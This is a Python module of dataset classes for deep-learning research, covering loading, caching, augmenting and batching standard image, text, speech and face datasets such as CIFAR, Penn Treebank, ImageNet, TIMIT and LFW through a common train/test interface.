# Copyright (c) 2017 Idiap Research Institute, http://www.idiap.ch/
# Written by Angelos Katharopoulos <angelos.katharopoulos@idiap.ch>
#
from bisect import bisect_left
from collections import OrderedDict, deque
from functools import partial
import gzip
from itertools import islice
import os
from os import path
import pickle
import sys
from tempfile import TemporaryFile
from threading import Condition, Lock, Thread
from keras.applications.resnet50 import preprocess_input
from keras.datasets import cifar10, cifar100, mnist
from keras.preprocessing.image import ImageDataGenerator
from keras.utils import np_utils
from keras.utils.generic_utils import Progbar
import numpy as np
from .utils.functional import compose
try:
from PIL import Image as pil_image
except ImportError:
pass
class cifar_sanity_check(object):
"""Create a dataset from a subset of CIFAR10 that is designed to be ideal
for importance sampling by having a sample repeated thousands of times"""
def __init__(self, classes=(3, 5), replicate=30000, replicate_idx=42):
assert len(classes) > 1
self.classes = classes
self.replicate = replicate
self.replicate_idx = replicate_idx
def load_data(self):
# Load the original data
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
# Get only the classes given
idxs_train = np.arange(len(y_train))[
np.logical_or(*[y_train == c for c in self.classes]).ravel()
]
idxs_test = np.arange(len(y_test))[
np.logical_or(*[y_test == c for c in self.classes]).ravel()
]
X_train = X_train[idxs_train]
y_train = y_train[idxs_train]
X_test = X_test[idxs_test]
y_test = y_test[idxs_test]
for i, c in enumerate(self.classes):
y_train[y_train == c] = i
y_test[y_test == c] = i
# Replicate one sample in the training set
x, y = X_train[self.replicate_idx], y_train[self.replicate_idx]
x = np.tile(x, (self.replicate, 1, 1, 1))
y = np.tile(y, (self.replicate, 1))
return (
(np.vstack([X_train, x]), np.vstack([y_train, y])),
(X_test, y_test)
)
class canevet_icml2016_nn(object):
"""Approximates the artifical dataset used in [1] section 4.2.
[1] Can\'evet, Olivier, et al. "Importance Sampling Tree for Large-scale
Empirical Expectation." Proceedings of the International Conference on
Machine Learning (ICML). No. EPFL-CONF-218848. 2016.
"""
def __init__(self, N=8192, test_split=0.33, smooth=40):
self.N = N
self.test_split = test_split
self.smooth = smooth
def load_data(self):
# Create the data using magic numbers to approximate the figure in
# canevet_icml2016
x = np.linspace(0, 1, self.N).astype(np.float32)
ones = np.ones_like(x).astype(int)
boundary = np.sin(4*(x + 0.5)**5)/3 + 0.5
data = np.empty(shape=[self.N, self.N, 3], dtype=np.float32)
data[:, :, 0] = 1-x
for i in range(self.N):
data[i, :, 1] = 1-x[i]
data[i, :, 2] = 1 / (1 + np.exp(self.smooth*(x - boundary[i])))
data[i, :, 2] = np.random.binomial(ones, data[i, :, 2])
data = data.reshape(-1, 3)
np.random.shuffle(data)
# Create train and test arrays
split = int(len(data)*self.test_split)
X_train = data[:-split, :2]
y_train = data[:-split, 2]
X_test = data[-split:, :2]
y_test = data[-split:, 2]
return (X_train, y_train), (X_test, y_test)
class BaseDataset(object):
class _DataProxy(object):
def __init__(self, dataset, subset):
self.data = getattr(dataset, "_%s_data" % (subset,))
self.size = getattr(dataset, "_%s_size" % (subset,))
def __getitem__(self, idxs):
return self.data(idxs)
def __len__(self):
return self.size()
def _train_data(self, idxs=slice(None)):
"""Return the training data in the form (x, y)"""
raise NotImplementedError()
def _train_size(self):
"""Training data length"""
x, y = self._train_data()
if isinstance(x, (list, tuple)):
return len(x[0])
else:
return len(x)
def _test_data(self, idxs=slice(None)):
"""Return the testing data in the form (x, y)"""
raise NotImplementedError()
def _test_size(self):
"""Test data length"""
x, y = self._test_data()
if isinstance(x, (list, tuple)):
return len(x[0])
else:
return len(x)
def _slice_data(self, x, y, idxs):
if isinstance(x, (list, tuple)):
return [xi[idxs] for xi in x], y[idxs]
else:
return x[idxs], y[idxs]
def _extract_shape(self, x):
if isinstance(x, (list, tuple)):
return [xi.shape[1:] for xi in x]
return x.shape[1:]
@property
def train_data(self):
return self._DataProxy(self, "train")
@property
def test_data(self):
return self._DataProxy(self, "test")
@property
def shape(self):
"""Return the shape of the samples"""
raise NotImplementedError()
@property
def output_size(self):
"""Return the number of outputs"""
raise NotImplementedError()
@property
def output_shape(self):
"""Return the shape of the output (it could differ for seq models for
instance)."""
return (self.output_size,)
class InMemoryDataset(BaseDataset):
"""A dataset that fits in memory and is simply 4 numpy arrays (x, y) *
(train, test) where x can also be a list of numpy arrays"""
def __init__(self, X_train, y_train, X_test, y_test, categorical=True):
self._x_train = X_train
self._x_test = X_test
# should the targets be turned into one-hot vectors?
if categorical:
self._y_train = np_utils.to_categorical(y_train)
self._y_test = np_utils.to_categorical(y_test)
self._output_size = self._y_train.shape[1]
# handle sparse output classification
elif issubclass(y_train.dtype.type, np.integer):
self._y_train = y_train
self._y_test = y_test
self._output_size = self._y_train.max() + 1 # assume 0 based idxs
# not classification, just copy them
else:
self._y_train = y_train
self._y_test = y_test
self._output_size = self._y_train.shape[1]
def _train_data(self, idxs=slice(None)):
return self._slice_data(self._x_train, self._y_train, idxs)
def _test_data(self, idxs=slice(None)):
return self._slice_data(self._x_test, self._y_test, idxs)
@property
def shape(self):
return self._extract_shape(self._x_train)
@property
def output_size(self):
return self._output_size
@classmethod
def from_loadable(cls, dataset):
(a, b), (c, d) = dataset.load_data()
return cls(a, b, c, d)
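# Illustrative usage sketch (not part of the original module; the array names are
# placeholders): an InMemoryDataset can be built from raw numpy arrays or from any
# object exposing a Keras-style load_data().
#
#   >>> ds = InMemoryDataset(X_train, y_train, X_test, y_test, categorical=True)
#   >>> x_batch, y_batch = ds.train_data[:32]   # first 32 training samples
#   >>> len(ds.test_data), ds.shape, ds.output_size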
class InMemoryImageDataset(InMemoryDataset):
"""Make sure that the in memory dataset has 4 dimensions and is normalized
to [0, 1]"""
def __init__(self, X_train, y_train, X_test, y_test, categorical=True):
# Expand the dims and make sure the shapes are correct image shapes
if len(X_train.shape) < 4:
X_train = np.expand_dims(X_train, axis=-1)
X_test = np.expand_dims(X_test, axis=-1)
assert X_train.shape[1:] == X_test.shape[1:]
assert len(X_train.shape) == 4
# Normalize to [0, 1]
X_train = X_train.astype(np.float32) / X_train.max()
X_test = X_test.astype(np.float32) / X_test.max()
super(InMemoryImageDataset, self).__init__(
X_train,
y_train,
X_test,
y_test,
categorical=categorical
)
CIFAR10 = partial(InMemoryImageDataset.from_loadable, cifar10)
CIFAR100 = partial(InMemoryImageDataset.from_loadable, cifar100)
MNIST = partial(InMemoryImageDataset.from_loadable, mnist)
CIFARSanityCheck = compose(
InMemoryImageDataset.from_loadable,
cifar_sanity_check
)
CanevetICML2016 = compose(InMemoryDataset.from_loadable, canevet_icml2016_nn)
class GeneratorDataset(BaseDataset):
"""GeneratorDataset wraps a generator (or two) and partially implements the
BaseDataset interface."""
def __init__(self, train_data, test_data=None, test_data_length=None,
cache_size=5):
self._train_data_gen = train_data
self._test_data_gen = test_data
self._test_data_len = test_data_length
self._cache_size = cache_size
# Determine the shapes and sizes
x, y = next(self._train_data_gen)
self._shape = self._extract_shape(x)
self._output_size = y.shape[1] if len(y.shape) > 1 else 1
# Create the queues
self._train_cache = deque()
self._train_lock = Lock()
self._train_cv = Condition(self._train_lock)
self._test_cache = deque()
self._test_lock = Lock()
self._test_cv = Condition(self._test_lock)
# Start the threads
self._train_thread = Thread(
name="train_thread",
target=self._generator_thread,
args=(
self._train_data_gen,
self._train_cache,
self._train_lock,
self._train_cv,
self._cache_size
)
)
self._test_thread = Thread(
name="test_thread",
target=self._generator_thread,
args=(
self._test_data_gen,
self._test_cache,
self._test_lock,
self._test_cv,
self._cache_size
)
)
self._train_thread.daemon = True
self._test_thread.daemon = True
self._train_thread.start()
self._test_thread.start()
@staticmethod
def _generator_thread(gen, cache, lock, cv, max_size):
if gen is None:
return
if isinstance(gen, (tuple, list, np.ndarray)):
return
while True:
xy = next(gen)
with lock:
while len(cache) >= max_size:
cv.wait()
cache.append(xy)
cv.notify()
def _get_count(self, idxs):
if isinstance(idxs, slice):
# Use 2**32 as infinity
start, stop, step = idxs.indices(2**32)
return (stop - start) // step
elif isinstance(idxs, (list, np.ndarray)):
return len(idxs)
elif isinstance(idxs, int):
return 1
else:
raise IndexError("Invalid indices passed to dataset")
def _get_at_least_n(self, cache, lock, cv, n):
cnt = 0
batches = []
with lock:
while cnt < n:
while len(cache) <= 0:
cv.wait()
batch = cache.popleft()
cv.notify()
cnt += len(batch[1])
if len(batch[1].shape)==1:
batch[1] = np.expand_dims(batch[1], -1)
if isinstance(batch[0], (list, tuple)):
batches.append(list(batch[0]) + [batch[1]])
else:
batches.append(batch)
try:
xy = tuple(map(np.vstack, zip(*batches)))
except ValueError:
# This means that the batches differ in more than the batch
# dimension
shapes = [
np.array([batch[i].shape for batch in batches])
for i in range(len(batches[0]))
]
N = shapes[0].sum(axis=0)[0]
shapes = [s.max(axis=0) for s in shapes]
shapes = [(N,) + tuple(s[1:].tolist()) for s in shapes]
xy = [
np.zeros(s, dtype=d.dtype)
for s, d in zip(shapes, batches[0])
]
starts = [0]*max(map(len, shapes))
for batch in batches:
for xyi, data in zip(xy, batch):
slices = tuple(
slice(start, start+length)
for start, length in zip(starts, data.shape)
)
xyi[slices] = data
starts[0] += len(batch[0])
if len(xy) > 2:
return list(xy[:-1]), xy[-1]
else:
return xy
def _train_data(self, idxs=slice(None)):
N = self._get_count(idxs)
x, y = self._get_at_least_n(
self._train_cache,
self._train_lock,
self._train_cv,
N
)
return self._slice_data(x, y, slice(N))
def _train_size(self):
raise RuntimeError("This dataset has no size")
def _test_data(self, idxs=slice(None)):
# No test data
if self._test_data_gen is None:
raise RuntimeError("This dataset has no test data")
# Test data are all in memory
if isinstance(self._test_data_gen, (tuple, list, np.ndarray)):
x, y = self._test_data_gen
return self._slice_data(x, y, idxs)
# Test data are provided via a generator
N = min(self._test_data_len, self._get_count(idxs))
x, y = self._get_at_least_n(
self._test_cache,
self._test_lock,
self._test_cv,
N
)
return self._slice_data(x, y, slice(N))
def _test_size(self):
# No test data
if self._test_data_gen is None:
raise RuntimeError("This dataset has no test data")
# Test data are all in memory
if isinstance(self._test_data_gen, (tuple, list, np.ndarray)):
x, y = self._test_data_gen
return len(x)
# Test data are provided via a generator
return self._test_data_len
@property
def shape(self):
return self._shape
@property
def output_size(self):
return self._output_size
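# Illustrative usage sketch (an assumption, not from the original code): wrap an
# infinite generator of (x, y) batches; test data can be given either as a second
# generator plus its length or as in-memory arrays.
#
#   >>> def batches():
#   ...     while True:
#   ...         x = np.random.rand(32, 10).astype(np.float32)
#   ...         y = np.random.randint(0, 2, size=(32, 1)).astype(np.float32)
#   ...         yield x, y
#   >>> ds = GeneratorDataset(batches(), test_data=(x_test, y_test))
#   >>> x, y = ds.train_data[:64]   # blocks until the cache holds 64 samples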
class ZCAWhitening(InMemoryImageDataset):
"""Make a whitened copy of the decorated dataset in memory."""
def __init__(self, dataset):
# Get the data in memory
x_train, y_train = dataset.train_data[:]
x_test, y_test = dataset.test_data[:]
# Make the whitener and train it
gen = ImageDataGenerator(zca_whitening=True, featurewise_center=True)
gen.fit(x_train)
batches_train = list(islice(
gen.flow(x_train, y_train, 32),
int(np.ceil(len(x_train) / 32.))
))
batches_test = list(islice(
gen.flow(x_test, y_test, 32),
int(np.ceil(len(x_test) / 32.))
))
super(ZCAWhitening, self).__init__(
np.vstack([b[0] for b in batches_train]),
np.vstack([b[1] for b in batches_train]),
np.vstack([b[0] for b in batches_test]),
np.vstack([b[1] for b in batches_test]),
categorical=False
)
class AugmentedImages(BaseDataset):
def __init__(self, dataset, augmentation_params, N=None):
# Initialize member variables
self.dataset = dataset
self.augmentation_params = augmentation_params
self.N = len(self.dataset.train_data) * 10 if N is None else N
assert len(self.dataset.shape) == 3
# Allocate space for the augmented data
self._x = np.memmap(
TemporaryFile(),
dtype=np.float32,
shape=(self.N,) + self.dataset.shape
)
self._y = np.zeros((self.N, self.dataset.output_size))
# Train a generator and generate all the data
generator = ImageDataGenerator(**self.augmentation_params)
x, y = self.dataset.train_data[:]
generator.fit(x)
start = 0
for bx, by in generator.flow(x, y, batch_size=128):
end = min(self.N, start+len(bx))
self._x[start:end] = bx[:end-start]
self._y[start:end] = by[:end-start]
start = end
if start >= self.N:
break
def _train_data(self, idxs=slice(None)):
return self._x[idxs], self._y[idxs]
def _test_data(self, idxs=slice(None)):
return self.dataset.test_data[idxs]
@property
def shape(self):
return self.dataset.shape
@property
def output_size(self):
return self.dataset.output_size
class OntheflyAugmentedImages(BaseDataset):
"""Use a Keras ImageDataGenerator to augment images on the fly in a
deterministic way."""
def __init__(self, dataset, augmentation_params, N=None, random_state=0,
cache_size=None):
# Initialize some member variables
self.dataset = dataset
self.generator = ImageDataGenerator(**augmentation_params)
self.N = N or (len(self.dataset.train_data) * 10)
self.random_state = random_state
assert len(self.dataset.shape) == 3
# Figure out the base images for each of the augmented ones
self.idxs = np.random.choice(
len(self.dataset.train_data),
self.N
)
# Fit the generator
self.generator.fit(self.dataset.train_data[:][0])
# Standardize the test data
self._x_test = np.copy(self.dataset.test_data[:][0])
self._x_test = self.generator.standardize(self._x_test)
self._y_test = self.dataset.test_data[:][1]
# Create an LRU cache to speed things up a bit for the transforms
cache_size = cache_size or len(self.dataset.train_data)
self.cache = OrderedDict([(-i, i) for i in range(cache_size)])
self.cache_data = np.empty(
shape=(cache_size,) + self.dataset.shape,
dtype=np.float32
)
def _transform(self, idx, x):
# if it is not cached add it
if idx not in self.cache:
# Remove the first in and add the new idx (i is the offset in
# cache_data)
_, i = self.cache.popitem(last=False)
self.cache[idx] = i
# Do the transformation and add it to the data
np.random.seed(idx + self.random_state)
x = self.generator.random_transform(x)
x = self.generator.standardize(x)
self.cache_data[i] = x
# otherwise mark it as the most recently used
else:
self.cache[idx] = self.cache.pop(idx)
return self.cache_data[self.cache[idx]]
def _train_data(self, idxs=slice(None)):
# Make sure we accept everything that numpy accepts as indices
idxs = np.arange(self.N)[idxs]
# Get the original images and then transform them
x, y = self.dataset.train_data[self.idxs[idxs]]
x_hat = np.copy(x)
random_state = np.random.get_state()
for i, idx in enumerate(idxs):
x_hat[i] = self._transform(idx, x_hat[i])
np.random.set_state(random_state)
return x_hat, y
def _test_data(self, idxs=slice(None)):
return self._x_test[idxs], self._y_test[idxs]
def _train_size(self):
return self.N
@property
def shape(self):
return self.dataset.shape
@property
def output_size(self):
return self.dataset.output_size
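# Illustrative usage sketch (an assumption): augment CIFAR10 on the fly with common
# shift/flip parameters; the same augmented index always yields the same transformed
# image because the RNG is seeded per index in _transform().
#
#   >>> dset = OntheflyAugmentedImages(
#   ...     CIFAR10(),
#   ...     dict(width_shift_range=0.1, height_shift_range=0.1,
#   ...          horizontal_flip=True),
#   ...     N=500000
#   ... )
#   >>> x1, _ = dset.train_data[[123]]
#   >>> x2, _ = dset.train_data[[123]]
#   >>> np.allclose(x1, x2)   # deterministic augmentation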
class PennTreeBank(BaseDataset):
"""Load the PennTreebank from Tomas Mikolov's format expected in the
default Keras directory."""
def __init__(self, context, ptb_path=None, val=True, verbose=True,
cache=True):
if ptb_path is None:
ptb_path = path.expanduser("~/.keras/datasets/ptb")
if val:
test = "valid"
else:
test = "test"
# Cache the dataset for faster subsequent loads
cache_path = path.join(ptb_path, "ptb.train-%s.pickle.gz" % (test,))
if not path.exists(cache_path):
with open(path.join(ptb_path, "ptb.train.txt")) as f:
train = [l.split() + ['<EOS>'] for l in f]
with open(path.join(ptb_path, "ptb.%s.txt" % (test,))) as f:
test = [l.split() + ['<EOS>'] for l in f]
V = np.array(sorted({w for l in train for w in l}))
N = max(max(map(len, train)), max(map(len, test)))
# No need to have context bigger than the biggest sentence
context = min(context, N)
# Allocate memory
x_train = np.empty((0, context), dtype=np.int32)
y_train = np.empty((0, 1), dtype=np.int32)
x_test = np.empty_like(x_train)
y_test = np.empty_like(y_train)
# Encode the strings to numbers
if verbose:
prog = Progbar(len(train) + len(test))
for i, s in enumerate(train):
xi, yi = self._encode(s, V, context)
x_train = np.vstack([x_train, xi])
y_train = np.vstack([y_train, yi])
if verbose and i % 100 == 0:
prog.update(i)
for i, s in enumerate(test):
xi, yi = self._encode(s, V, context)
x_test = np.vstack([x_test, xi])
y_test = np.vstack([y_test, yi])
if verbose and i % 100 == 0:
prog.update(len(train) + i)
if verbose:
prog.update(len(train) + len(test))
with gzip.open(cache_path, "wb") as f:
pickle.dump(
{
"train": (x_train, y_train),
"test": (x_test, y_test),
"vocab": V
},
f,
protocol=2
)
# Read the dataset from the cached binary file
with gzip.open(cache_path) as f:
data = pickle.load(f)
self._x_train, self._y_train = data["train"]
self._x_test, self._y_test = data["test"]
self.V = data["vocab"]
def _encode(self, s, V, context):
"""
Arguments
----------
s: Sentence as a list of strings
V: Vocabulary as a np array of strings
context: The maximum length of previous words to include
"""
idxs = np.searchsorted(V, s)
x = np.zeros((len(s)-1, context), dtype=np.int32)
y = np.zeros((len(s)-1, 1), np.int32)
for i in range(1, len(s)):
x[i-1, :i] = idxs[:i][-context:] + 1 # 0 means missing value
y[i-1] = idxs[i]
return x, y
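# Worked example of the encoding above (illustrative, with a toy vocabulary):
# each row of x holds the 1-based vocabulary indices of up to `context` previous
# words, left-aligned and zero-padded (0 means missing), and y holds the next word.
#
#   s = ["the", "cat", "sat"], V = ["cat", "sat", "the"]  ->  idxs = [2, 0, 1]
#   x = [[3, 0, 0],      y = [[0],    # predict "cat" from "the"
#        [3, 1, 0]]           [1]]    # predict "sat" from "the cat"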
def _train_data(self, idxs=slice(None)):
return self._x_train[idxs], self._y_train[idxs]
def _test_data(self, idxs=slice(None)):
return self._x_test[idxs], self._y_test[idxs]
@property
def shape(self):
return self._x_train.shape[1:]
@property
def output_size(self):
return len(self.V)
class ImageNetDownsampled(BaseDataset):
"""Dataset interface to the downsampled ImageNet [1].
The data are expected in the following format:
_ base-path/
\_ imagenet-16x16
|_ imagenet-32x32
|_ imagenet-64x64
\_ mean.npy
|_ train_data.npy
|_ train_labels.npy
|_ val_data.npy
|_ val_labels.npy
1: A Downsampled Variant of ImageNet as an Alternative to the CIFAR
datasets (https://arxiv.org/abs/1707.08819v2)
"""
def __init__(self, basepath, size=32, mmap=False):
basepath = path.join(basepath, "imagenet-%dx%d" % (size, size))
self.mean = np.load(path.join(basepath, "mean.npy"))
self._y_train = np.load(path.join(basepath, "train_labels.npy"))
self._y_val = np.load(path.join(basepath, "val_labels.npy"))
self._x_train = np.load(
path.join(basepath, "train_data.npy"),
mmap_mode="r" if mmap else None
)
self._x_val = np.load(
path.join(basepath, "val_data.npy"),
mmap_mode="r" if mmap else None
)
def _get_batch(self, X, Y, idxs):
"""Preprocess the batch by subtracting the mean and normalizing."""
if isinstance(idxs, slice):
idxs = np.arange(2*len(X))[idxs]
N = len(idxs)
x = np.zeros((N,) + self.shape, dtype=np.float32)
y = np.zeros((N, 1000), dtype=np.float32)
# Fill in the class information
y[np.arange(N), Y[idxs % len(X)]-1] = 1.
# Fill in the images
d = self.shape[0]
x[:] = X[idxs % len(X)]
flip = (idxs // len(X)) == 1 # if idx >= len(X) flip horizontally
x[flip] = x[flip, :, ::-1]
x -= self.mean
x /= 255
return x, y
def _train_data(self, idxs=slice(None)):
return self._get_batch(self._x_train, self._y_train, idxs)
def _test_data(self, idxs=slice(None)):
return self._get_batch(self._x_val, self._y_val, idxs)
def _train_size(self):
return 2*len(self._x_train)
def _test_size(self):
return len(self._x_val)
@property
def shape(self):
return self._x_train.shape[1:]
@property
def output_size(self):
return 1000
class TIMIT(InMemoryDataset):
"""Load the TIMIT dataset [1] from a custom pickled format.
The format is the following:
[
X_train,
y_train,
X_val,
y_val,
X_test,
y_test
]
Each X_* is a list of numpy arrays that contain the full utterance
features.
Each y_* is a list of numpy arrays that contain the per phoneme label
for the full utterance.
[1] Garofolo, John S., et al. TIMIT Acoustic-Phonetic Continuous Speech
Corpus LDC93S1. Web Download. Philadelphia: Linguistic Data Consortium,
1993
"""
def __init__(self, context, path, val=False):
# Read the data
data = pickle.load(open(path, "rb"))
train = data[:2]
test = data[2:4] if val else data[4:]
x_train, y_train = self._create_xy(train, context)
x_test, y_test = self._create_xy(test, context)
super(TIMIT, self).__init__(
x_train, y_train,
x_test, y_test,
categorical=False
)
def _create_xy(self, data, context):
X = []
y = []
for xi, yi in zip(*data):
for j in range(context-1, len(xi)):
X.append(xi[j-context+1:j+1])
y.append(yi[j:j+1]) # slice so that y.shape == (?, 1)
return np.array(X, dtype=np.float32), np.array(y, dtype=np.int32)
class MIT67(BaseDataset):
"""Dataset interface to the MIT67 Indoor Scenes dataset [1].
The dataset is expected to be in the following format:
- base-path/
\_ images
\_ airport_inside
|_ artstudio
|_ ...
|_ TrainImages.txt
|_ TestImages.txt
1: Quattoni, Ariadna, and Antonio Torralba. "Recognizing indoor scenes."
Computer Vision and Pattern Recognition, 2009. CVPR 2009. IEEE
Conference on. IEEE, 2009.
"""
def __init__(self, basepath):
self._base = basepath
# Read the file paths
self._train_set = np.array([
l.strip() for l in
open(path.join(basepath, "TrainImages.txt"))
])
self._test_set = np.array([
l.strip() for l in
open(path.join(basepath, "TestImages.txt"))
])
# Create masks to lazily read the data in memory
self._unread_train = np.ones(len(self._train_set), dtype=np.bool)
self._unread_test = np.ones(len(self._test_set), dtype=np.bool)
# Allocate space for the images
self._x_train = np.zeros(
(len(self._train_set), 224, 224, 3),
dtype=np.float32
)
self._x_test = np.zeros(
(len(self._test_set), 224, 224, 3),
dtype=np.float32
)
# Create the target classes
class_set = np.array(sorted(set([
filepath.split("/")[0]
for filepath in self._train_set
])))
self._y_train = self._to_classes(self._train_set, class_set)
self._y_test = self._to_classes(self._test_set, class_set)
def _to_classes(self, files, class_set):
y = np.zeros((len(files), len(class_set)), dtype=np.float32)
for i, f in enumerate(files):
yi = f.split("/")[0]
y[i, np.searchsorted(class_set, yi)] = 1.
return y
def _read_and_return(self, unread, files, data, idxs):
if np.any(unread[idxs]):
for i in np.arange(len(files))[idxs]:
if not unread[i]:
continue
data[i] = self._read_image(files[i])
unread[i] = False
return data[idxs]
def _train_size(self):
return len(self._x_train)
def _train_data(self, idxs=slice(None)):
return self._read_and_return(
self._unread_train,
self._train_set,
self._x_train,
idxs
), self._y_train[idxs]
def _test_size(self):
return len(self._x_test)
def _test_data(self, idxs=slice(None)):
return self._read_and_return(
self._unread_test,
self._test_set,
self._x_test,
idxs
), self._y_test[idxs]
def _read_image(self, image_path):
"""Read an image from disk, resize, crop and preprocess it using the
ImageNet stats."""
image_path = path.join(self._base, "images", image_path)
img = pil_image.open(image_path).convert("RGB")
s = max(224./img.width, 224./img.height)
nw, nh = int(s * img.width), int(s * img.height)
pw, ph = int((nw - 224)/2), int((nh - 224)/2)
dims = nw, nh
box = (pw, ph, pw+224, ph+224)
img = img.resize(dims, pil_image.BILINEAR).crop(box)
return preprocess_input(np.array(img, dtype=np.float32))
@property
def shape(self):
return (224, 224, 3)
@property
def output_size(self):
return 67
class CASIAWebFace(BaseDataset):
"""Provide a BaseDataset interface to CASIAWebFace.
The interface is created for training with a triplet loss which is a bit
unorthodox.
Arguments
---------
basepath: The path to the dataset
alpha: The margin for the triplet loss (returned as target)
validation: Consider as the validation set all the person ids for which
id % validation == 0
"""
def __init__(self, basepath, alpha=0.2, embedding=128, validation=5,
cache=4096):
# Save the configuration in member variables
self._alpha = alpha
self._embedding = embedding
# Load the paths for the images
self._basepath = basepath
ids = [x for x in os.listdir(basepath) if "." not in x]
self._train = np.array([
x for x in ids if int(x.replace("0", "")) % validation > 0
])
self._n_images = np.array([
len([
img for img in os.listdir(path.join(basepath, x))
if img.endswith("jpg")
]) for x in self._train
])
self._idxs = np.arange(self._n_images.sum())
# Create the necessary variables for the cache
self._cache = np.zeros((cache, 3, 224, 224, 3), dtype=np.float32)
self._cache_lock = Lock()
self._cache_cv = Condition(self._cache_lock)
# Start a thread to load images and wait for the cache to be filled
self._producer_thread = Thread(target=self._update_images)
self._producer_thread.daemon = True
with self._cache_lock:
self._producer_thread.start()
while np.all(self._cache[-1] == 0):
self._cache_cv.wait()
def _get_batch_memory(self, N):
if not hasattr(self, "_batch_xa") or len(self._batch_xa) < N:
self._batch_xa = np.zeros((N, 224, 224, 3), dtype=np.float32)
self._batch_xp = np.zeros_like(self._batch_xa)
self._batch_xn = np.zeros_like(self._batch_xa)
return self._batch_xa[:N], self._batch_xp[:N], self._batch_xn[:N]
def _train_data(self, idxs=slice(None)):
N = len(self._idxs[idxs])
y = np.ones((N, 1), dtype=np.float32)*self._alpha
xa, xp, xn = self._get_batch_memory(N)
samples = np.random.choice(len(self._cache), N)
with self._cache_lock:
xa[:] = self._cache[samples, 0]
xp[:] = self._cache[samples, 1]
xn[:] = self._cache[samples, 2]
return [xa, xp, xn], y
def _train_size(self):
return self._n_images.sum()
def _test_data(self, idxs=slice(None)):
return [np.random.rand(1, 224, 224, 3)]*3, np.zeros((1, 1))
def _test_size(self):
return 1
@property
def shape(self):
return [(224, 224, 3)]*3
@property
def output_size(self):
return self._embedding
def _update_images(self):
try:
with self._cache_lock:
for i in range(len(self._cache)):
triplet = self._read_random_triplet()
self._cache[i, 0] = triplet[0]
self._cache[i, 1] = triplet[1]
self._cache[i, 2] = triplet[2]
self._cache_cv.notifyAll()
while True:
triplet = self._read_random_triplet()
i = np.random.choice(len(self._cache))
with self._cache_lock:
self._cache[i, 0] = triplet[0]
self._cache[i, 1] = triplet[1]
self._cache[i, 2] = triplet[2]
except:
if sys is not None:
sys.stderr.write("Producer thread tear down by exception\n")
def _read_random_triplet(self):
pos = np.random.choice(len(self._train))
neg = np.random.choice(len(self._train))
if pos == neg:
return self._read_random_triplet()
anchor_image, pos_image = np.random.choice(self._n_images[pos], 2)
if anchor_image == pos_image:
return self._read_random_triplet()
neg_image = np.random.choice(self._n_images[neg])
# Now we have our triplet
return (
self._read_image(self._train[pos], anchor_image),
self._read_image(self._train[pos], pos_image),
self._read_image(self._train[neg], neg_image)
)
def _read_image(self, person, image):
image_path = path.join(
self._basepath,
person,
"{:03d}.jpg".format(image+1)
)
img = pil_image.open(image_path).convert("RGB")
img = img.resize((224, 224), pil_image.BILINEAR)
return preprocess_input(np.array(img, dtype=np.float32))
class LFW(BaseDataset):
"""BaseDataset interface to Labeled Faces in the Wild dataset.
The dataset provides both images and indexes for the lfw folds.
Arguments
---------
basepath: The path to the dataset
fold: [1,10] or None
Choose a fold to evaluate on or all the images
idxs: bool
Whether to load images or just indexes for the fold
"""
def __init__(self, basepath, fold=1, idxs=False):
self._basepath = basepath
self._fold = fold
self._idxs = idxs
self._collect_images()
self._collect_pairs()
def _image_path(self, name, img):
return path.join(name, "{}_{:04d}".format(name, img))
def _get_person(self, image):
return bisect_left(
self._names,
image.split(os.sep)[0]
)
def _get_idx(self, name, img):
return bisect_left(self._images, self._image_path(name, img))
def _collect_images(self):
"""Collect all the image paths into a sorted list."""
image_path = path.join(self._basepath, "all_images")
self._names = np.array(sorted(set([
name for name in os.listdir(image_path)
if path.isdir(path.join(image_path, name))
])))
self._images = np.array(sorted([
path.join(name, img)
for name in self._names
for img in os.listdir(path.join(image_path, name))
if img.endswith(".jpg")
]))
def _collect_pairs(self):
if self._fold is None:
return
with open(path.join(self._basepath, "view2", "pairs.txt")) as f:
folds, n = map(int, next(f).split())
assert 1 <= self._fold <= folds
idxs = np.zeros((n*2*folds, 2), dtype=np.int32)
matches = np.zeros((n*2*folds, 1), dtype=np.float32)
for i, l in enumerate(f):
parts = l.split()
matches[i] = float(len(parts) == 3)
if matches[i]:
idxs[i] = [
self._get_idx(parts[0], int(parts[1])),
self._get_idx(parts[0], int(parts[2]))
]
else:
idxs[i] = [
self._get_idx(parts[0], int(parts[1])),
self._get_idx(parts[2], int(parts[3]))
]
idxs_2 = np.arange(len(idxs))
train = np.logical_or(
idxs_2 < 2*n*(self._fold - 1),
idxs_2 >= 2*n*self._fold
)
test = np.logical_and(
idxs_2 >= 2*n*(self._fold - 1),
idxs_2 < 2*n*self._fold
)
self._idxs_train = idxs[train]
self._idxs_test = idxs[test]
self._y_train = matches[train]
self._y_test = matches[test]
def _read_image(self, image):
full_img_path = path.join(self._basepath, "all_images", image)
img = pil_image.open(full_img_path).convert("RGB")
img = img.resize((224, 224), pil_image.BILINEAR)
return preprocess_input(np.array(img, dtype=np.float32))
def _get_data(self, pairs):
if self._idxs:
return pairs
else:
x1 = np.stack(map(self._read_image, self._images[pairs[:, 0]]))
x2 = np.stack(map(self._read_image, self._images[pairs[:, 1]]))
return [x1, x2]
def _train_data(self, idxs=slice(None)):
if self._fold is None:
images = self._images[idxs]
x = np.stack(map(self._read_image, images))
y = np.array(list(map(self._get_person, images)))
else:
x = self._get_data(self._idxs_train[idxs])
y = self._y_train[idxs]
return x, y
def _train_size(self):
if self._fold is None:
return len(self._images)
return len(self._idxs_train)
def _test_data(self, idxs=slice(None)):
if self._fold is None:
raise NotImplementedError()
x = self._get_data(self._idxs_test[idxs])
y = self._y_test[idxs]
return x, y
def _test_size(self):
return 0 if self._fold is None else len(self._idxs_test)
@property
def shape(self):
if self._fold is None:
return (224, 224, 3)
else:
if self._idxs:
return (2,)
else:
return [(224, 224, 3)]*2
@property
def output_size(self):
return 1
class CASIAWebFace2(BaseDataset):
"""Provide a classification interface to CASIAWebFace."""
def __init__(self, basepath):
self._basepath = basepath
ids = [x for x in os.listdir(basepath) if "." not in x]
self._output_size = len(ids)
self._images = [
(path.join(basepath, x, img), i) for i, x in enumerate(ids)
for img in os.listdir(path.join(basepath, x))
if img.endswith("jpg")
]
self._idxs = np.arange(len(self._images))
def _read_image(self, image_path):
img = pil_image.open(image_path).convert("RGB")
img = img.resize((224, 224), pil_image.BILINEAR)
return preprocess_input(np.array(img, dtype=np.float32))
def _train_data(self, idxs=slice(None)):
idxs = self._idxs[idxs]
y = np.array([self._images[i][1] for i in idxs])[:, np.newaxis]
x = np.stack([
self._read_image(self._images[i][0])
for i in idxs
])
return x, y
